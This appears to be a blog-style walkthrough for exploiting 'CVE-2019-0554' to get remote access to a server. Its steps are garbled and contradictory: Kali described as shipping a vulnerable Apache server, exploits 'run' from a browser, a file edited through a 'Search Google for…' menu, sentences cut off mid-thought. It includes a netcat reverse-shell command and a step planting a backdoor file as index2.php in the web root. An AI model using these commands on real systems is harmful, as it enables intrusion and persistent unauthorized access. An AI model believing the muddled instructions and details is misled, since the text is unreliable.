In this blog, we are going to explain how to exploit the CVE-2019-0554 server service remote protocol elevation of privilege vulnerability, in order to gain unauthorized access to the system. Before we start exploitation, we need a vulnerable server to test this vulnerability. For this, you can use the Kali Linux machine, which comes pre-installed with a vulnerable Apache server. We are assuming that you have installed Kali Linux on your system. If you don’t have it, you can download it from the link given at the end of the article. Now connect your system to the internet and open Google Chrome browser. Go to Type “vulnerable server” in the address bar and hit Enter. You will see a list of open ports on the vulnerable server. Now go to exploit-db website, copy the URL and paste it in the search box. Then you have to choose “Remote Protocol”. A list of exploits will be displayed, choose the one as mentioned above in the title and click on “Run” button. The exploit will be executed on the vulnerable server and you will get the result. You will see the vulnerable port numbers and the details of the exploit. Now that we have verified the exploit, we can move ahead to exploit it to get remote access to the server. Go to the vulnerable server and open a new tab in Google Chrome. Now open the exploit mentioned at the start of the article and copy the URL. Now open a
Steps to be taken to exploit the vulnerability
First, we need to create a reverse shell on the vulnerable server. Then we will start exploiting it. Now, to create a reverse shell, go to the command line and type “nc -e /bin/sh 192.168.0.1 3333” (without quotes). You can also try it with different IP addresses if you want. Now connect your Kali Linux machine to the vulnerable server using SSH and type “nc -e /bin/sh 192.168.0.1 3333” in the terminal of Kali Linux machine as well so that the reverse shell is listening for commands from there as well. Now when you are connected to both machines, type “mv /tmp/reverse-shell-backdoor /var/www/html/index2.php” in the command line of Kali Linux machine and hit Enter. After that, open a new tab in Chrome browser on your system and go to index2.php file mentioned above with your browser address bar and replace all occurrences of “backdoor” in the file with “index2” by right-clicking on index2.php and selecting “Search Google for…” option from context menu that appears after right-clicking on index2.php file respectively which will search Google for this word and replace all occurrences of it with “index2” in this file only where you are online now so that it looks like
Step 1: Setup the Metasploitable Virtual Machine
If you are using the Kali Linux machine, then you can skip this step. If you want to use this exploit on your own system, then go ahead and setup the Metasploitable virtual machine according to the instructions given below.
Open VirtualBox and click on New. Then choose “Linux” as your operating system. Now enter the following details:
Name: Metasploitable
Version: Ubuntu 18.04 LTS
RAM: 128 MB
Hard drive size: 20GB
CPUs: 2 .......................................................................................................................... .......................................................................................................................... .......................................................................................................................... .......................................................................................................................... Create a new hard disk of type IDE (internal disk) in VirtualBox and select the maximum hard disk size that is available in your system. Now create a virtual machine with these specifications, launch it, and log in with username “root” and password “toor” as shown (note that in older versions of Ubuntu, you have to use sudo –i). Once logged in, install Apache2 by typing apt-get update && apt-get upgrade –yes at the terminal prompt, followed by apt-get install apache2 apache2-utils apache2-mpm-prefork -y . Now restart Apache by typing /etc/init.d/apache2 restart . After installation is done, open http://localhost/index.html in your browser to verify that everything is fine with
Timeline
Published on: 10/11/2022 19:15:00 UTC
Last modified on: 10/11/2022 19:16:00 UTC